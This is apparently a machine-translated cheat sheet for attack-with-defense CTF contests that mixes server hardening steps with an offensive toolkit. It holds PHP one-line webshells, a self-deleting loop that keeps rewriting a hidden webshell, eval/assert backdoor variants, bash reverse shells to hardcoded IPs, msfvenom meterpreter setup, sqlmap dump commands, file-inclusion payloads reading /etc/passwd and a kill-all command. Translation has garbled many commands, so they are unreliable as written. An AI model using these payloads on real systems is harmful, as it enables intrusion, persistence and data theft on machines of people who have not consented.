AWD
Backup source, modify the account password, and then see if there is backdoor deleted
Modify the mysql password
Format: mysqladmin -u username -p password new password the old password
example: mysqladmin-uroot--p password 123 123456
MySQL full backup and restore
A backup - a database: mysqldump -u Username -p Password database name> /root/XXX.bak
The specified database backup to the next roo home directory, the file name XXX.bak
Recovery : mysql -u Username -p Password Database name </root/XXX.bak
Trojan sentence
<?php @eval($_REQUEST['pass']); ?> <%eval request("pass")%> <?php @eval($_POST['c']); ?>
Permission to maintain: 1. dead horse, 2. nc rebound shell nc -lp 9999
ps auxww | grep shell.php After finding the pid can kill the process
Modify ssh file vim / etc / ssh / sshd_config PermitRootLogin no
Rearmost plus AllowUsers liu liu1
linux modify the file owner and group files are located
chgrp user file name -R
chown username filename -R
chmod -R 777 /var/home/userid/cc
1 View port
netstat - tunpl netstat -tunpl | grep 23 (see port 23 is open)
2. Check the corresponding port applications
lsof -i: xxx search process ps aux
3. Close the port
【iptable】
sudo iptables -A INPUT -p tcp --dport $PORT -j DROP"
sudo iptables -A OUTPUT -p tcp --dport $PORT -j DROP"
【kill】
ps aux
kill -9 PID "(PID: Process ID)
sudo /etc/init.d/apache2 restart
A . Defense strategy
command injection vulnerability
a) cases str1 = $ _POST [ 'cmd' ], in str1 before connecting character '#' comment character, str1 = "#". $ _POST [ 'cmd']
b)
upload files vulnerabilities
a ) written comments to upload the code.
b)
file that contains the vulnerability
a) modify the php.ini file
allow_url_fopen ON
allow_url_include ON
amended as
allow_url_fopen OFF
allow_url_include OFF
b)
remote code execution vulnerability
a) Notes hazard function: system () exec_shell () eval () the Assert () create_function () preg_replace () file_put_contents ()
b)
buffer overflow vulnerability
a) the current reference "7.Linux authority loophole" defense.
b)
the system back door vulnerabilities
a) directly delete the backdoor
b) "Ps -ef | grep bash "command to see if there are backdoors bash
c) "ss -ltnp" command to see whether there is a backdoor listening port
d) find the program pid from the two steps, with the "kill pid" backdoor bash command to end the program
e) in the web site directory, view the contents of the documents found webshell word or Trojan, delete files or comment Code
f)
Linux privilege vulnerability
a) "PS -ef | grep httpd " command to see if the implementation of the Apache service is the root service, if /etc/httpd/httpd.conf modify files found "user" after "group" field plus apache apache, restart the httpd service. Apache service is the apache user to perform the service.
B) modify / bin / cat / bin / echo command key and other binary files, change its name, let the attacker can not use bash reads flag contents of the file.
1. Anti-XSS
Using the strip_tags () function filtered string HTML tags;
Using htmlspecialchars () function to convert sensitive character.
$message = mysql_real_escape_string($message);
As the body text output, as html tag attributes Output:
For example: <span> $ {username} </ span>, <P> <C: OUT value = "$ {username}"> </ C: OUT> </ P>
<INPUT type = "text" value = "$ {username}" />
in this case escape rules are as follows:
<converted to <
> transformed into>
& & converted into
to "convert"
'turn into'
JavaScript event
< input type = "button" οnclick = 'go_to_url ( "$ {myUrl}");' />
in addition to those above to escape, but also the following additional escape:
\ turn into \\
/ turn into \ /
; turn into; (full;)
E) the uRL attribute
if <script>, src and href attribute <style>, <imt> tag is dynamic content and the like, to ensure that it is not malicious connection url.
Ensure that: the value of href and src must begin with http: // at the beginning, whitelist mode; can not have 10 decimal and hexadecimal encoding characters.
? : Parameter passing parameters, dynamic representatives are
the Title: transfer function parameter name
: value of parameter passing content (which is decoded after encoded into url "Profile", generally reflective XSS injection point)
F) Upload waf
If a frame writevery good web deployed directly require rewriting file or database file, php file if it is fragmented, and that there are ways, if it is fastcgi (nginx, IIS more common) running php on to add that in .user.ini specific Baidu, .user.ini the back door, the same principle. Other cases may be forced to write a script to add that in front of each PHP, sample script code will be released. (Of course, apache .htaccess also be forced to rewrite waf then back to the original page, but in case it did not override the environment)
1. waf.php spread to the directory to include file
2. Add the page guard, there two approaches, according to a case where two selected from:
a) added to the code pages required protection.
require_once ( 'waf.php');
can do page-injection, cross-site
if you want the whole station anti-Note, it in a public document site, such as a database link file config.inc.php in!
Add require_once ( 'waf.php'); The code to call
common php add a file system
PHPCMS the V9 \ phpCMS \ base.php
PHPWIND8.7 \ Data \ sql_config.php
DEDECMS5.7 \ Data \ common.inc.php
DiscuzX2 \ config \ config_global.php
Wordpress \ WP-config.php
MetInfo \ the include \ head.php
b). in front of each file with the most codes
inphp.ini中找到:
Automatically add files before or after any PHP document.
auto_prepend_file = waf.php路径;
Upload waf
If the frame is written web deployed very good, directly require rewriting file or database file, php file if it is fragmented, and that there are ways, if it is fastcgi (nginx, IIS more common) running php just .user.ini add that specific Baidu, .user.ini the back door, the same principle. Other cases may be forced to write a script to add that in front of each PHP, sample script code will be released. (Of course, apache .htaccess also be forced to rewrite waf then back to the original page, but in case it did not override the environment)
1. waf.php transmitted to the directory containing the file
2. Add the page protection, there are two ways, according to a case where two selected from:
. A) was added code page required protection
require_once ( 'waf .php ');
it can be done page-injection, cross-site
if you want the whole station anti-Note, on the site of a public document, as the database link file config.inc.php in!
Add require_once ( 'waf.php'); The code to call
common php add a file system
PHPCMS the V9 \ phpCMS \ base.php
PHPWIND8.7 \ Data \ sql_config.php
DEDECMS5.7 \ Data \ common.inc.php
DiscuzX2 \ config \ config_global.php
Wordpress \ WP-config.php
MetInfo \ the include \ head.php
b) in each file plus the foremost code
in find the php.ini:
Automatically the add files or the After the before the any PHP the document.
auto_prepend_file = waf. php path;
Common reinforcing way:
Reinforcing process:
- Modify Webmaster password
- Backup website source
- tar -zcf /tmp/name.tar.gz / path / web
- takes -zcf /tmp/name.tar.gz / var / www / html
- backup database
- mysqldump -u username -p database name > exported file name
- mysqldump -u user -p database > /tmp/database.sql
- Modify ssh password (that is, change the current user password)
- Modify MySQL password
- set password for the user name @localhost = password ( ' new password ');
- set password for user@localhost = password('123');
- Modify MongoDB password (port 27017)
- Modify Redis code (port 6379)
- Modify the website source code database connection configuration
- Deployment waf (subject to availability)
File monitoring
Prepare a script, monitor and delete all the new files.
Find a memory horse, direct restart php.
If the monitor script is not available, use the command periodically review and modify the new file.
find web path -ctime -1 (see recent day the new file is suspicious)
( 1) user login, enter 'test for the presence sql injection point, universal password' or 1 = '1 weak passwords admin / admin Firefox Plugin hackbar
select name,pass from tbAdmin where name='' or 1='1' and pass='123456'
( 2) ah D scanning website sql injection point, sqlmap injection,
When the game Access database injection point:
http://10.1.14.1/ReadNews.asp?NewsID=20&BigClassID=2&SmallClassID=2
sqlmap -u "url" View system, version
sqlmap -u "url" --dbs burst Database
sqlmap -u "url" --tables -D ctf 爆表
sqlmap -u "url" --column -D ctf -T users 爆列
sqlmap -u "url" --dump -D ctf -T users "user_name,user_pass" 爆字段
Web site information database password files are generally placed in config.php.
3. The file contains
( 1) local file that contains
localhost/a.php?file=/flag.txt
( 2) Remote File Inclusion
localhost/a.php?file=http:ip/echo.txt
Use, upload Trojans sentence
echo.txt file content, content will generate shell.php sentence Trojans.
<?php fputs(fopen("shell.php","w"),"<?php eval(\$_POST[xx]);?>");?>
Common file contains the function, the include (), include_once (), The require (), require_once ()
Several classic test methods:
? File = .. / .. / .. / .. / .. / etc / passwd cut long directory
? Page = file: /// etc / passwd to read sensitive documents
?home=main.cgi
?page=http://www.a.com/1.php
http://1.1.1.1/../../../../dir/file.txt
4. unauthorized access allow_url_fopen = ON, allow_url_include = ON
Level ultra vires: Modify the id, others visit
Vertical ultra vires: know how to manage background url, through access, elevate privileges, access to data.
/admin/upload/config.php unauthorized access, without landing, direct display
Defense website
The WAF, file monitoring, security dog,
On the header write, require_once ( 'waf.php');
There may flag here:
- Sword scan, double-click to open the Web page, there is a flag.
- ssh login, the system root directory, / under var / www / html
- mysql database fields.
- Remote Desktop host, folder
For a web traffic php crawl, application analysis.
Can be found competition use under ctf line, you can use the actual scene came for web traffic analysis attacks.
weblogger-master to use:
cd /var/www/html/ (or other web dir)
git clone https://github.com/wupco/weblogger.git
chmod -R 777 weblogger/
open http://xxxxx/weblogger/install.php in Web browser
install it
CTFDefense-CTFDefense
1.ctf-firewall.sh
iptables configuration commands, can be a key to perform a quick configuration. You may need to be slightly modified depending on the environment when used
2.commannd.md
Some common line next race linux operating commands
3.getRoot
Some local privilege escalation poc, each file has a detailed usage notes, compiled for the file in the release directory. There are several practical script
4. Display
A simple file monitoring sample script that can monitor create, delete, move, property modification, automatically delete new files or directories. Used pyinstaller packaged into linux executables
5. WAF
linux version of security dogs and several waf script
nmap -nv ip n Do DNS
nmap -sS ip SYN
High strength nmap -T4 -A
python -c 'import pty;pty.spawn("/bin/bash")'
tar -zcf /tmp/xxx.tar.gz html
takes -xzvf /tmp/xxx.tar.gz
mysqldump –uxxx –pxxx dbname > xxx.sql
passwd
Modify Webmaster password
update users set password=md5(“xxxxxx”);
Modify the database password
set password for the user name @localhost = password ( 'new password');
bash -i >& /dev/tcp/10.51.4.222/8384 0>&1
bash -i >& /dev/tcp/10.11.23.226/5555 0>&1
/bin/bash -i &> /dev/tcp/10.51.4.222/8384 0>&1
echo "/bin/bash -i &> /dev/tcp/10.11.20.71/5555 0>&1" | /bin/bash
rm -rf / var / www / html / upload_lab / upload / *
zip:///var/www/html/upload/test.zip#test.php
http://123.206.174.251/include/2/?
op=zip://uploads/ea064516fe1e37af816bb52faa08eeb8589af4c0.png%23p
Use msf
msfvenom -p php/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=5555-f raw > 77778888.php
msfconsole:
use multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 5555
set ExitOnSession false
run -j
php dead horse
caidao
<?php
ignore_user_abort(true);
set_time_limit(0);
unlink(__FILE__);
$file = '/var/www/dvwa/.ski12.php';
$file = 'D:\\z_myweb\\phpStudy\\DVWA-master\\dvwa\\busi.php';
$code = '<?php if(md5($_GET["pass"])=="cdd7b7420654eb16c1e1b748d5b7c5b8"){@eval($_POST['a']);}?>';
while (1) {
file_put_contents($file, $code);
//system('touch -m -d "2018-12-01 09:10:12" .ski12.php');
usleep(5000);
}
back door
eval($_POST[“a”]);
assert ($ _ POST [ "a"]); can be written $ a = "assert"; $ a ($ _ POST [a]);
array_filter(array($_POST[“a”]),”assert”);
preg_replace("/test/e",$_POST[“a"],"jutst test");
$func =create_function('',$_POST[‘a’]);$func();
echo array_map(“assert”, array($_POST[“a”]));
call_user_func("assert",$_POST['cmd’]);
call_user_func_array("assert", array($_POST[“a”]));
and many more
Delete dead horse
kill -9 -1
kill -9 -1
New User linux
useradd -m username1
passwd username1
usermod -a -G sudo username1
Anti injection
addslashes
htmlspecialchars